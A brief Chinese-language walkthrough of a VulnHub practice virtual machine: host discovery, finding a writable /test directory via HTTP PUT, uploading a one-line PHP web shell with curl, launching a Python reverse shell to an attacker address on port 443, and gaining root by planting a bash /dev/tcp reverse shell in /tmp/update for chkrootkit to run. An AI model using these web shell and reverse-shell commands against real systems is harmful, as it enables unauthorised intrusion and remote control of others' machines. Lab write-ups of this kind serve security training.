主機來源:www.vulnhub.com
發現IP
安裝成功後,查找此虛擬機的IP,我使用的是netdiscover
IP爲10.0.3.144
nmap![]()
沒啥開的端口,從80開始,掃下目錄,發現test目錄,然後發現有PUT方法
上傳
利用weevely來生成一個木馬文件,weevely是kali中的PHP菜刀
連接
或者直接用curl命令來上傳一個小馬
curl -v -X PUT -d '<?php system($_GET["c"]); ?>' http://10.0.3.144/test/22.php
客戶端監聽,nc -nlvp 443
curl或者瀏覽器中訪問
http://10.0.3.144/test/22.php?c=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket%28socket.AF_INET,socket.SOCK_STREAM%29;s.connect%28%28%2210.0.3.141%22,443%29%29;os.dup2%28s.fileno%28%29,0%29;%20os.dup2%28s.fileno%28%29,1%29;%20os.dup2%28s.fileno%28%29,2%29;p=subprocess.call%28[%22/bin/sh%22,%22-i%22]%29;%27
獲得shell
提權
利用chkrootkit提權
寫入文件
printf '#!/bin/bash\nbash -i >& /dev/tcp/10.0.3.141/443 0>&1\n' >> /tmp/update
等待,獲得root
爲什麼用443,是因爲一般防火牆策略會只開很少的端口
